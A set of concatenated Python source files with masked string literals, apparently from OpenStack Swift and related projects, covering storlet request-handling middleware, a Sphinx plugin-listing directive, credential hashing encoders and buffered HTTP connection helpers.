self , field_name , exist_id , uuid ) : <EOL> self . field_name = field_name <EOL> self . reason = "<STR_LIT>" "<STR_LIT>" . format ( <EOL> failed_at = datetime . datetime . utcnow ( ) , uuid = uuid , <EOL> field_name = field_name , exist_id = exist_id ) <EOL> class WrongTypeException ( VerificationException ) : <EOL> def __init__ ( self , field_name , value , exist_id , uuid ) : <EOL> self . field_name = field_name <EOL> self . value = value <EOL> self . exist_id = exist_id <EOL> self . uuid = uuid <EOL> self . reason = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" . format ( <EOL> failed_at = datetime . datetime . utcnow ( ) , uuid = self . uuid , <EOL> field_name = self . field_name , value = self . value , <EOL> exist_id = self . exist_id ) </s>
<s> from __future__ import unicode_literals <EOL> import inspect <EOL> from docutils import nodes <EOL> from docutils . parsers import rst <EOL> from docutils . parsers . rst import directives <EOL> from docutils . statemachine import ViewList <EOL> from sphinx . util . nodes import nested_parse_with_titles <EOL> from stevedore import extension <EOL> def _get_docstring ( plugin ) : <EOL> return inspect . getdoc ( plugin ) or '<STR_LIT>' <EOL> def _simple_list ( mgr ) : <EOL> for name in sorted ( mgr . names ( ) ) : <EOL> ext = mgr [ name ] <EOL> doc = _get_docstring ( ext . plugin ) or '<STR_LIT:\n>' <EOL> summary = doc . splitlines ( ) [ <NUM_LIT:0> ] . strip ( ) <EOL> yield ( '<STR_LIT>' % ( ext . name , summary ) , <EOL> ext . entry_point . module_name ) <EOL> def _detailed_list ( mgr , over = '<STR_LIT>' , under = '<STR_LIT:->' , titlecase = False ) : <EOL> for name in sorted ( mgr . names ( ) ) : <EOL> ext = mgr [ name ] <EOL> if over : <EOL> yield ( over * len ( ext . name ) , ext . entry_point . module_name ) <EOL> if titlecase : <EOL> yield ( ext . name . title ( ) , ext . entry_point . module_name ) <EOL> else : <EOL> yield ( ext . name , ext . entry_point . module_name ) <EOL> if under : <EOL> yield ( under * len ( ext . name ) , ext . entry_point . module_name ) <EOL> yield ( '<STR_LIT:\n>' , ext . entry_point . module_name ) <EOL> doc = _get_docstring ( ext . plugin ) <EOL> if doc : <EOL> yield ( doc , ext . entry_point . module_name ) <EOL> else : <EOL> yield ( '<STR_LIT>' <EOL> % ext . entry_point , <EOL> ext . entry_point . module_name ) <EOL> yield ( '<STR_LIT:\n>' , ext . entry_point . module_name ) <EOL> class ListPluginsDirective ( rst . Directive ) : <EOL> """<STR_LIT>""" <EOL> option_spec = { <EOL> '<STR_LIT:class>' : directives . class_option , <EOL> '<STR_LIT>' : directives . flag , <EOL> '<STR_LIT>' : directives . flag , <EOL> '<STR_LIT>' : directives . single_char_or_unicode , <EOL> '<STR_LIT>' : directives . single_char_or_unicode , <EOL> } <EOL> has_content = True <EOL> def run ( self ) : <EOL> env = self . state . document . settings . env <EOL> app = env . app <EOL> namespace = '<STR_LIT:U+0020>' . join ( self . content ) . strip ( ) <EOL> app . info ( '<STR_LIT>' % namespace ) <EOL> overline_style = self . options . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> underline_style = self . options . get ( '<STR_LIT>' , '<STR_LIT:=>' ) <EOL> def report_load_failure ( mgr , ep , err ) : <EOL> app . warn ( u'<STR_LIT>' % ( ep . module_name , err ) ) <EOL> mgr = extension . ExtensionManager ( <EOL> namespace , <EOL> on_load_failure_callback = report_load_failure , <EOL> ) <EOL> result = ViewList ( ) <EOL> titlecase = '<STR_LIT>' in self . options <EOL> if '<STR_LIT>' in self . options : <EOL> data = _detailed_list ( <EOL> mgr , over = overline_style , under = underline_style , <EOL> titlecase = titlecase ) <EOL> else : <EOL> data = _simple_list ( mgr ) <EOL> for text , source in data : <EOL> for line in text . splitlines ( ) : <EOL> result . append ( line , source ) <EOL> node = nodes . section ( ) <EOL> node . document = self . state . document <EOL> nested_parse_with_titles ( self . state , result , node ) <EOL> return node . children <EOL> def setup ( app ) : <EOL> app . info ( '<STR_LIT>' ) <EOL> app . add_directive ( '<STR_LIT>' , ListPluginsDirective ) </s>
<s> """<STR_LIT>""" <EOL> import ConfigParser <EOL> import urllib <EOL> from eventlet import Timeout <EOL> from six . moves . urllib . parse import quote <EOL> from swift . common . constraints import check_copy_from_header , check_destination_header <EOL> from swift . common . swob import HTTPException , Response , HTTPBadRequest , HTTPMethodNotAllowed , HTTPPreconditionFailed , HTTPRequestedRangeNotSatisfiable , HTTPInternalServerError , wsgify <EOL> from swift . common . utils import config_true_value , get_logger , is_success , register_swift_info <EOL> from swift . proxy . controllers . base import get_account_info <EOL> from storlet_middleware . storlet_common import StorletRuntimeException , StorletTimeout <EOL> class NotStorletRequest ( Exception ) : <EOL> pass <EOL> class NotStorletExecution ( NotStorletRequest ) : <EOL> pass <EOL> def _request_instance_property ( ) : <EOL> """<STR_LIT>""" <EOL> def getter ( self ) : <EOL> return self . _request <EOL> def setter ( self , request ) : <EOL> self . _request = request <EOL> try : <EOL> self . _extract_vaco ( ) <EOL> except ValueError : <EOL> raise NotStorletRequest ( ) <EOL> return property ( getter , setter , <EOL> doc = "<STR_LIT>" ) <EOL> class BaseStorletHandler ( object ) : <EOL> """<STR_LIT>""" <EOL> request = _request_instance_property ( ) <EOL> def __init__ ( self , request , conf , app , logger ) : <EOL> """<STR_LIT>""" <EOL> self . request = request <EOL> self . app = app <EOL> self . logger = logger <EOL> self . conf = conf <EOL> self . gateway_class = self . conf [ '<STR_LIT>' ] <EOL> def _setup_gateway ( self ) : <EOL> """<STR_LIT>""" <EOL> self . gateway = self . gateway_class ( <EOL> self . conf , self . logger , self . app , self . api_version , <EOL> self . account , self . container , self . obj ) <EOL> self . _update_storlet_parameters_from_headers ( ) <EOL> def _extract_vaco ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _api_version , self . _account , self . _container , self . _obj = self . _parse_vaco ( ) <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _api_version <EOL> @ property <EOL> def account ( self ) : <EOL> return self . _account <EOL> @ property <EOL> def container ( self ) : <EOL> return self . _container <EOL> @ property <EOL> def obj ( self ) : <EOL> return self . _obj <EOL> def _parse_vaco ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def handle_request ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def is_storlet_execution ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' in self . request . headers <EOL> @ property <EOL> def is_range_request ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' in self . request . headers <EOL> @ property <EOL> def is_storlet_range_request ( self ) : <EOL> return '<STR_LIT>' in self . request . headers <EOL> def is_slo_response ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( <EOL> '<STR_LIT>' . format ( <EOL> self . account , self . container , self . obj ) ) <EOL> is_slo = '<STR_LIT>' in resp . headers <EOL> if is_slo : <EOL> self . logger . debug ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:object>' . format ( self . account , self . container , self . obj ) ) <EOL> else : <EOL> self . logger . debug ( <EOL> '<STR_LIT>' . format ( <EOL> self . account , self . container , self . obj ) ) <EOL> return is_slo <EOL> def _update_storlet_parameters_from_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> parameters = { } <EOL> for param in self . request . headers : <EOL> if param . lower ( ) . startswith ( '<STR_LIT>' ) : <EOL> keyvalue = self . request . headers [ param ] <EOL> keyvalue = urllib . unquote ( keyvalue ) <EOL> [ key , value ] = keyvalue . split ( '<STR_LIT::>' ) <EOL> parameters [ key ] = value <EOL> self . request . params . update ( parameters ) <EOL> def _call_gateway ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def apply_storlet ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> outmd , app_iter = self . _call_gateway ( resp ) <EOL> new_headers = resp . headers . copy ( ) <EOL> if '<STR_LIT>' in new_headers : <EOL> new_headers . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in new_headers : <EOL> new_headers . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in resp . headers : <EOL> new_headers [ '<STR_LIT>' ] = resp . headers [ '<STR_LIT>' ] <EOL> new_headers . pop ( '<STR_LIT>' ) <EOL> return Response ( headers = new_headers , app_iter = app_iter , <EOL> reuqest = self . request ) <EOL> class StorletProxyHandler ( BaseStorletHandler ) : <EOL> def __init__ ( self , request , conf , app , logger ) : <EOL> super ( StorletProxyHandler , self ) . __init__ ( <EOL> request , conf , app , logger ) <EOL> self . storlet_container = conf . get ( '<STR_LIT>' ) <EOL> self . storlet_dependency = conf . get ( '<STR_LIT>' ) <EOL> self . storlet_containers = [ self . storlet_container , <EOL> self . storlet_dependency ] <EOL> if not self . is_storlet_request : <EOL> raise NotStorletRequest ( ) <EOL> account_meta = get_account_info ( self . request . environ , <EOL> self . app ) [ '<STR_LIT>' ] <EOL> storlets_enabled = account_meta . get ( '<STR_LIT>' , <EOL> '<STR_LIT:False>' ) <EOL> if not config_true_value ( storlets_enabled ) : <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> raise HTTPBadRequest ( '<STR_LIT>' , <EOL> request = self . request ) <EOL> if self . is_storlet_object_update : <EOL> self . _validate_registration ( self . request ) <EOL> raise NotStorletExecution ( ) <EOL> else : <EOL> self . _setup_gateway ( ) <EOL> def _parse_vaco ( self ) : <EOL> return self . request . split_path ( <NUM_LIT:4> , <NUM_LIT:4> , rest_with_last = True ) <EOL> def is_proxy_runnable ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> runnable = any ( <EOL> [ self . is_storlet_range_request , self . is_slo_response ( resp ) , <EOL> self . conf [ '<STR_LIT>' ] ] ) <EOL> return runnable <EOL> @ property <EOL> def is_storlet_request ( self ) : <EOL> return self . is_storlet_execution or self . is_storlet_object_update <EOL> @ property <EOL> def is_storlet_object_update ( self ) : <EOL> return ( self . container in self . storlet_containers and self . obj <EOL> and self . request . method in [ '<STR_LIT>' , '<STR_LIT:POST>' ] ) <EOL> @ property <EOL> def is_put_copy_request ( self ) : <EOL> return '<STR_LIT>' in self . request . headers <EOL> def _parse_storlet_params ( self , headers ) : <EOL> params = dict ( ) <EOL> for key in headers : <EOL> if key . startswith ( '<STR_LIT>' ) : <EOL> params [ key [ len ( '<STR_LIT>' ) : ] ] = headers [ key ] <EOL> return params <EOL> def _validate_registration ( self , req ) : <EOL> params = self . _parse_storlet_params ( req . headers ) <EOL> try : <EOL> if self . container == self . storlet_container : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . gateway_class . validate_storlet_registration ( <EOL> params , self . obj ) <EOL> else : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . gateway_class . validate_dependency_registration ( <EOL> params , self . obj ) <EOL> except ValueError as e : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPBadRequest ( e . message ) <EOL> def handle_request ( self ) : <EOL> if hasattr ( self , self . request . method ) : <EOL> resp = getattr ( self , self . request . method ) ( ) <EOL> return resp <EOL> else : <EOL> raise HTTPMethodNotAllowed ( req = self . request ) <EOL> def _call_gateway ( self , resp ) : <EOL> return self . gateway . gatewayProxyGetFlow ( <EOL> self . request , self . container , self . obj , resp ) <EOL> def GET ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_range_request : <EOL> raise HTTPBadRequest ( '<STR_LIT>' <EOL> '<STR_LIT>' , request = self . request ) <EOL> self . gateway . authorizeStorletExecution ( self . request ) <EOL> self . gateway . augmentStorletRequest ( self . request ) <EOL> if self . is_storlet_range_request : <EOL> self . request . headers [ '<STR_LIT>' ] = self . request . headers [ '<STR_LIT>' ] <EOL> original_resp = self . request . get_response ( self . app ) <EOL> if original_resp . is_success : <EOL> if self . is_proxy_runnable ( original_resp ) : <EOL> return self . apply_storlet ( original_resp ) <EOL> else : <EOL> if '<STR_LIT>' in original_resp . headers : <EOL> original_resp . headers . pop ( '<STR_LIT>' ) <EOL> original_resp . headers [ '<STR_LIT>' ] = None <EOL> return original_resp <EOL> else : <EOL> return original_resp <EOL> def _validate_copy_request ( self ) : <EOL> unsupported_headers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for header in unsupported_headers : <EOL> if self . request . headers . get ( header ) : <EOL> raise HTTPBadRequest ( <EOL> '<STR_LIT>' % <EOL> header ) <EOL> def handle_put_copy_response ( self , out_md , app_iter ) : <EOL> self . request . environ [ '<STR_LIT>' ] = app_iter <EOL> if '<STR_LIT>' in self . request . environ : <EOL> self . request . environ . pop ( '<STR_LIT>' ) <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return self . request . get_response ( self . app ) <EOL> def base_handle_copy_request ( self , src_container , src_obj , <EOL> dest_container , dest_object ) : <EOL> """<STR_LIT>""" <EOL> source_path = '<STR_LIT>' % ( self . api_version , self . account , <EOL> src_container , src_obj ) <EOL> source_req = self . request . copy_get ( ) <EOL> source_req . headers . pop ( '<STR_LIT>' , None ) <EOL> source_req . headers . pop ( '<STR_LIT>' , None ) <EOL> source_req . path_info = source_path <EOL> source_req . headers [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> source_resp = source_req . get_response ( self . app ) <EOL> ( out_md , app_iter ) = self . gateway . gatewayProxyCopyFlow ( self . request , <EOL> dest_container , <EOL> dest_object , <EOL> source_resp ) <EOL> resp = self . handle_put_copy_response ( out_md , app_iter ) <EOL> acct , path = source_resp . environ [ '<STR_LIT>' ] . split ( '<STR_LIT:/>' , <NUM_LIT:3> ) [ <NUM_LIT:2> : <NUM_LIT:4> ] <EOL> resp . headers [ '<STR_LIT>' ] = quote ( acct ) <EOL> resp . headers [ '<STR_LIT>' ] = quote ( path ) <EOL> if '<STR_LIT>' in source_resp . headers : <EOL> resp . headers [ '<STR_LIT>' ] = source_resp . headers [ '<STR_LIT>' ] <EOL> return resp <EOL> def PUT ( self ) : <EOL> """<STR_LIT>""" <EOL> self . gateway . authorizeStorletExecution ( self . request ) <EOL> self . gateway . augmentStorletRequest ( self . request ) <EOL> if self . is_put_copy_request : <EOL> self . _validate_copy_request ( ) <EOL> src_container , src_obj = check_copy_from_header ( self . request ) <EOL> dest_container = self . container <EOL> dest_object = self . obj <EOL> self . request . headers . pop ( '<STR_LIT>' , None ) <EOL> return self . base_handle_copy_request ( src_container , src_obj , <EOL> dest_container , dest_object ) <EOL> ( out_md , app_iter ) = self . gateway . gatewayProxyPutFlow ( self . request , <EOL> self . container , self . obj ) <EOL> return self . handle_put_copy_response ( out_md , app_iter ) <EOL> def COPY ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . request . headers . get ( '<STR_LIT>' ) : <EOL> return HTTPPreconditionFailed ( request = self . request , <EOL> body = '<STR_LIT>' ) <EOL> self . gateway . authorizeStorletExecution ( self . request ) <EOL> self . gateway . augmentStorletRequest ( self . request ) <EOL> self . _validate_copy_request ( ) <EOL> dest_container , dest_object = check_destination_header ( self . request ) <EOL> self . request . method = '<STR_LIT>' <EOL> self . request . path_info = '<STR_LIT>' % ( self . account , dest_container , dest_object ) <EOL> self . request . headers [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> del self . request . headers [ '<STR_LIT>' ] <EOL> return self . base_handle_copy_request ( self . container , self . obj , <EOL> dest_container , dest_object ) <EOL> class StorletObjectHandler ( BaseStorletHandler ) : <EOL> def __init__ ( self , request , conf , app , logger ) : <EOL> super ( StorletObjectHandler , self ) . __init__ ( <EOL> request , conf , app , logger ) <EOL> if ( self . is_storlet_execution ) : <EOL> self . _setup_gateway ( ) <EOL> else : <EOL> raise NotStorletRequest ( ) <EOL> def _parse_vaco ( self ) : <EOL> _ , _ , acc , cont , obj = self . request . split_path ( <EOL> <NUM_LIT:5> , <NUM_LIT:5> , rest_with_last = True ) <EOL> return ( '<STR_LIT:0>' , acc , cont , obj ) <EOL> @ property <EOL> def is_slo_get_request ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . request . params . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def handle_request ( self ) : <EOL> if hasattr ( self , self . request . method ) : <EOL> return getattr ( self , self . request . method ) ( ) <EOL> else : <EOL> raise HTTPMethodNotAllowed ( request = self . request ) <EOL> def _call_gateway ( self , resp ) : <EOL> return self . gateway . gatewayObjectGetFlow ( <EOL> self . request , self . container , self . obj , resp ) <EOL> def GET ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> if self . is_range_request and not self . is_storlet_range_request : <EOL> raise HTTPRequestedRangeNotSatisfiable ( <EOL> '<STR_LIT>' , <EOL> request = self . request ) <EOL> orig_resp = self . request . get_response ( self . app ) <EOL> if not is_success ( orig_resp . status_int ) : <EOL> return orig_resp <EOL> not_runnable = any ( <EOL> [ self . is_storlet_range_request , self . is_slo_get_request , <EOL> self . conf [ '<STR_LIT>' ] , <EOL> self . is_slo_response ( orig_resp ) ] ) <EOL> if not_runnable : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . account , self . container , self . obj , <EOL> '<STR_LIT>' ) ) <EOL> return orig_resp <EOL> else : <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . account , self . container , self . obj , <EOL> '<STR_LIT>' ) ) <EOL> return self . apply_storlet ( orig_resp ) <EOL> class StorletHandlerMiddleware ( object ) : <EOL> def __init__ ( self , app , conf , storlet_conf ) : <EOL> self . app = app <EOL> self . logger = get_logger ( conf , log_route = '<STR_LIT>' ) <EOL> self . stimeout = int ( storlet_conf . get ( '<STR_LIT>' ) ) <EOL> self . storlet_containers = [ storlet_conf . get ( '<STR_LIT>' ) , <EOL> storlet_conf . get ( '<STR_LIT>' ) ] <EOL> self . exec_server = storlet_conf . get ( '<STR_LIT>' ) <EOL> self . handler_class = self . _get_handler ( self . exec_server ) <EOL> self . gateway_module = storlet_conf [ '<STR_LIT>' ] <EOL> self . proxy_only_storlet_execution = storlet_conf [ '<STR_LIT>' ] <EOL> self . gateway_conf = storlet_conf <EOL> def _get_handler ( self , exec_server ) : <EOL> """<STR_LIT>""" <EOL> if exec_server == '<STR_LIT>' : <EOL> return StorletProxyHandler <EOL> elif exec_server == '<STR_LIT:object>' : <EOL> return StorletObjectHandler <EOL> else : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % exec_server ) <EOL> @ wsgify <EOL> def __call__ ( self , req ) : <EOL> try : <EOL> request_handler = self . handler_class ( <EOL> req , self . gateway_conf , self . app , self . logger ) <EOL> self . logger . debug ( '<STR_LIT>' % <EOL> ( self . exec_server , request_handler . account , <EOL> request_handler . container , request_handler . obj ) ) <EOL> except HTTPException : <EOL> raise <EOL> except NotStorletRequest : <EOL> return req . get_response ( self . app ) <EOL> try : <EOL> return request_handler . handle_request ( ) <EOL> except StorletTimeout : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> except StorletRuntimeException : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> except Timeout : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> except HTTPException : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise <EOL> except Exception : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> raise HTTPInternalServerError ( body = '<STR_LIT>' ) <EOL> def filter_factory ( global_conf , ** local_conf ) : <EOL> conf = global_conf . copy ( ) <EOL> conf . update ( local_conf ) <EOL> storlet_conf = dict ( ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> storlet_conf [ '<STR_LIT>' ] = config_true_value ( conf . get ( '<STR_LIT>' , '<STR_LIT:false>' ) ) <EOL> storlet_conf [ '<STR_LIT>' ] = { } <EOL> storlet_conf [ '<STR_LIT>' ] = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> module_name = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mo = module_name [ : module_name . rfind ( '<STR_LIT::>' ) ] <EOL> cl = module_name [ module_name . rfind ( '<STR_LIT::>' ) + <NUM_LIT:1> : ] <EOL> module = __import__ ( mo , fromlist = [ cl ] ) <EOL> the_class = getattr ( module , cl ) <EOL> configParser = ConfigParser . RawConfigParser ( ) <EOL> configParser . read ( conf . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> additional_items = configParser . items ( "<STR_LIT>" ) <EOL> for key , val in additional_items : <EOL> storlet_conf [ key ] = val <EOL> swift_info = { } <EOL> storlet_conf [ "<STR_LIT>" ] = the_class <EOL> register_swift_info ( '<STR_LIT>' , False , ** swift_info ) <EOL> def storlet_handler_filter ( app ) : <EOL> return StorletHandlerMiddleware ( app , conf , storlet_conf ) <EOL> return storlet_handler_filter </s>
<s> """<STR_LIT>""" <EOL> import hashlib <EOL> import os <EOL> MAX_TOKEN_LENGTH = <NUM_LIT> <EOL> class Plaintext ( object ) : <EOL> """<STR_LIT>""" <EOL> def encode ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % key <EOL> def match ( self , key , creds ) : <EOL> """<STR_LIT>""" <EOL> return self . encode ( key ) == creds <EOL> class Sha1 ( object ) : <EOL> """<STR_LIT>""" <EOL> def encode_w_salt ( self , salt , key ) : <EOL> """<STR_LIT>""" <EOL> enc_key = '<STR_LIT>' % ( salt , key ) <EOL> enc_val = hashlib . sha1 ( enc_key ) . hexdigest ( ) <EOL> return "<STR_LIT>" % ( salt , enc_val ) <EOL> def encode ( self , key ) : <EOL> """<STR_LIT>""" <EOL> salt = self . salt or os . urandom ( <NUM_LIT:32> ) . encode ( '<STR_LIT>' ) . rstrip ( ) <EOL> return self . encode_w_salt ( salt , key ) <EOL> def match ( self , key , creds ) : <EOL> """<STR_LIT>""" <EOL> type , rest = creds . split ( '<STR_LIT::>' ) <EOL> salt , enc = rest . split ( '<STR_LIT:$>' ) <EOL> return self . encode_w_salt ( salt , key ) == creds <EOL> class Sha512 ( object ) : <EOL> """<STR_LIT>""" <EOL> def encode_w_salt ( self , salt , key ) : <EOL> """<STR_LIT>""" <EOL> enc_key = '<STR_LIT>' % ( salt , key ) <EOL> enc_val = hashlib . sha512 ( enc_key ) . hexdigest ( ) <EOL> return "<STR_LIT>" % ( salt , enc_val ) <EOL> def encode ( self , key ) : <EOL> """<STR_LIT>""" <EOL> salt = self . salt or os . urandom ( <NUM_LIT:32> ) . encode ( '<STR_LIT>' ) . rstrip ( ) <EOL> return self . encode_w_salt ( salt , key ) <EOL> def match ( self , key , creds ) : <EOL> """<STR_LIT>""" <EOL> type , rest = creds . split ( '<STR_LIT::>' ) <EOL> salt , enc = rest . split ( '<STR_LIT:$>' ) <EOL> return self . encode_w_salt ( salt , key ) == creds </s>
<s> """<STR_LIT>""" <EOL> from swift import gettext_ as _ <EOL> from swift . common import constraints <EOL> import logging <EOL> import time <EOL> import socket <EOL> import eventlet <EOL> from eventlet . green . httplib import CONTINUE , HTTPConnection , HTTPMessage , HTTPResponse , HTTPSConnection , _UNKNOWN <EOL> from six . moves . urllib . parse import quote <EOL> import six <EOL> httplib = eventlet . import_patched ( '<STR_LIT>' ) <EOL> httplib . _MAXHEADERS = constraints . MAX_HEADER_COUNT <EOL> class BufferedHTTPResponse ( HTTPResponse ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , sock , debuglevel = <NUM_LIT:0> , strict = <NUM_LIT:0> , <EOL> method = None ) : <EOL> self . sock = sock <EOL> self . _real_socket = sock . fd . _sock <EOL> self . fp = sock . makefile ( '<STR_LIT:rb>' ) <EOL> self . debuglevel = debuglevel <EOL> self . strict = strict <EOL> self . _method = method <EOL> self . msg = None <EOL> self . version = _UNKNOWN <EOL> self . status = _UNKNOWN <EOL> self . reason = _UNKNOWN <EOL> self . chunked = _UNKNOWN <EOL> self . chunk_left = _UNKNOWN <EOL> self . length = _UNKNOWN <EOL> self . will_close = _UNKNOWN <EOL> self . _readline_buffer = '<STR_LIT>' <EOL> def expect_response ( self ) : <EOL> if self . fp : <EOL> self . fp . close ( ) <EOL> self . fp = None <EOL> self . fp = self . sock . makefile ( '<STR_LIT:rb>' , <NUM_LIT:0> ) <EOL> version , status , reason = self . _read_status ( ) <EOL> if status != CONTINUE : <EOL> self . _read_status = lambda : ( version , status , reason ) <EOL> self . begin ( ) <EOL> else : <EOL> self . status = status <EOL> self . reason = reason . strip ( ) <EOL> self . version = <NUM_LIT:11> <EOL> self . msg = HTTPMessage ( self . fp , <NUM_LIT:0> ) <EOL> self . msg . fp = None <EOL> def read ( self , amt = None ) : <EOL> if not self . _readline_buffer : <EOL> return HTTPResponse . read ( self , amt ) <EOL> if amt is None : <EOL> buffered = self . _readline_buffer <EOL> self . _readline_buffer = '<STR_LIT>' <EOL> return buffered + HTTPResponse . read ( self , amt ) <EOL> elif amt <= len ( self . _readline_buffer ) : <EOL> res = self . _readline_buffer [ : amt ] <EOL> self . _readline_buffer = self . _readline_buffer [ amt : ] <EOL> return res <EOL> else : <EOL> smaller_amt = amt - len ( self . _readline_buffer ) <EOL> buf = self . _readline_buffer <EOL> self . _readline_buffer = '<STR_LIT>' <EOL> return buf + HTTPResponse . read ( self , smaller_amt ) <EOL> def readline ( self , size = <NUM_LIT> ) : <EOL> while ( '<STR_LIT:\n>' not in self . _readline_buffer <EOL> and len ( self . _readline_buffer ) < size ) : <EOL> read_size = size - len ( self . _readline_buffer ) <EOL> chunk = HTTPResponse . read ( self , read_size ) <EOL> if not chunk : <EOL> break <EOL> self . _readline_buffer += chunk <EOL> line , newline , rest = self . _readline_buffer . partition ( '<STR_LIT:\n>' ) <EOL> self . _readline_buffer = rest <EOL> return line + newline <EOL> def nuke_from_orbit ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _real_socket : <EOL> self . _real_socket . close ( ) <EOL> self . _real_socket = None <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> HTTPResponse . close ( self ) <EOL> self . sock = None <EOL> self . _real_socket = None <EOL> class BufferedHTTPConnection ( HTTPConnection ) : <EOL> """<STR_LIT>""" <EOL> response_class = BufferedHTTPResponse <EOL> def connect ( self ) : <EOL> self . _connected_time = time . time ( ) <EOL> ret = HTTPConnection . connect ( self ) <EOL> self . sock . setsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY , <NUM_LIT:1> ) <EOL> return ret <EOL> def putrequest ( self , method , url , skip_host = <NUM_LIT:0> , skip_accept_encoding = <NUM_LIT:0> ) : <EOL> self . _method = method <EOL> self . _path = url <EOL> return HTTPConnection . putrequest ( self , method , url , skip_host , <EOL> skip_accept_encoding ) <EOL> def getexpect ( self ) : <EOL> response = BufferedHTTPResponse ( self . sock , strict = self . strict , <EOL> method = self . _method ) <EOL> response . expect_response ( ) <EOL> return response <EOL> def getresponse ( self ) : <EOL> response = HTTPConnection . getresponse ( self ) <EOL> logging . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:time>' : time . time ( ) - self . _connected_time , <EOL> '<STR_LIT>' : self . _method , '<STR_LIT:host>' : self . host , <EOL> '<STR_LIT:port>' : self . port , '<STR_LIT:path>' : self . _path } ) <EOL> return response <EOL> def http_connect ( ipaddr , port , device , partition , method , path , <EOL> headers = None , query_string = None , ssl = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( path , six . text_type ) : <EOL> try : <EOL> path = path . encode ( "<STR_LIT:utf-8>" ) <EOL> except UnicodeError as e : <EOL> logging . exception ( _ ( '<STR_LIT>' ) , str ( e ) ) <EOL> if isinstance ( device , six . text_type ) : <EOL> try : <EOL> device = device . encode ( "<STR_LIT:utf-8>" ) <EOL> except UnicodeError as e : <EOL> logging . exception ( _ ( '<STR_LIT>' ) , str ( e ) ) <EOL> path = quote ( '<STR_LIT:/>' + device + '<STR_LIT:/>' + str ( partition ) + path ) <EOL> return http_connect_raw ( <EOL> ipaddr , port , method , path , headers , query_string , ssl ) <EOL> def http_connect_raw ( ipaddr , port , method , path , headers = None , <EOL> query_string = None , ssl = False ) : <EOL> """<STR_LIT>""" <EOL> if not port : <EOL> port = <NUM_LIT> if ssl else <NUM_LIT> <EOL> if ssl : <EOL> conn = HTTPSConnection ( '<STR_LIT>' % ( ipaddr , port ) ) <EOL> else : <EOL> conn = BufferedHTTPConnection ( '<STR_LIT>' % ( ipaddr , port ) ) <EOL> if query_string : <EOL> path += '<STR_LIT:?>' + query_string <EOL> conn . path = path <EOL> conn . putrequest ( method , path , skip_host = ( headers and '<STR_LIT>' in headers ) ) <EOL> if headers : <EOL> for header , value in headers . items ( ) : <EOL> conn . putheader ( header , str ( value ) ) <EOL> conn . endheaders ( ) <EOL> return conn </s>
